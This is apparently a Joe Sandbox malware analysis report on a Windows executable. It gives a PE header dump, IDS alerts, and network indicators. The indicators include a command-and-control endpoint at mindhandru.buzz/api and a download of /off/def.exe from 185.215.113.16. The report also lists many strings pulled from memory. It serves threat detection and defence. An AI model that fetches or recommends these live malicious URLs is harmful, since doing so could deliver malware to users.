00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 74 77 78 76 6c 65 6c 00 40 2a 00 00 a0 00 00 00 32 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 6c 62 78 68 75 6e 00 20 00 00 00 e0 2a 00 00 04 00 00 00 9a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 9e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49755 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49777 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49784 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.21
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.21
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.21
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.21
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.21
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic

HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: TTsfmr1RWm.exe, 00000000.00000003.2548606886.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2562807391.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481754685.0000000001343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: TTsfmr1RWm.exe, 00000000.00000002.2630782603.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481754685.0000000001343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeedbK~
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481391461.0000000001311000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375621189.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397925602.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481539128.000000000131D000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2398086687.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_108.6.dr	String found in binary or memory: http://schema.org/Organization
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_108.6.dr, chromecache_110.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_108.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_108.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_108.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_108.6.dr	String found in binary or memory: https://github.com/nschonni
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_108.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: TTsfmr1RWm.exe, 00000000.00000003.2375508681.0000000001333000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/&
Source: TTsfmr1RWm.exe, 00000000.00000003.2319666198.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/4
Source: TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/DXJ
Source: TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/Z
Source: TTsfmr1RWm.exe, 00000000.00000003.2475289845.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481539128.0000000001326000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397844272.0000000001343000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375404477.0000000001343000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2369555565.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2343873210.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2344144240.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2415730333.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2319666198.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2417973568.0000000001326000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2415415649.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: TTsfmr1RWm.exe, 00000000.00000003.2481539128.0000000001326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api4
Source: TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apir
Source: TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/b
Source: TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/j
Source: TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/pi
Source: TTsfmr1RWm.exe, 00000000.00000003.2397844272.0000000001332000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397781741.0000000001327000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/pi:
Source: TTsfmr1RWm.exe, 00000000.00000003.2416406816.0000000001343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_109.6.dr	String found in binary or memory: https://schema.org
Source: TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_109.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
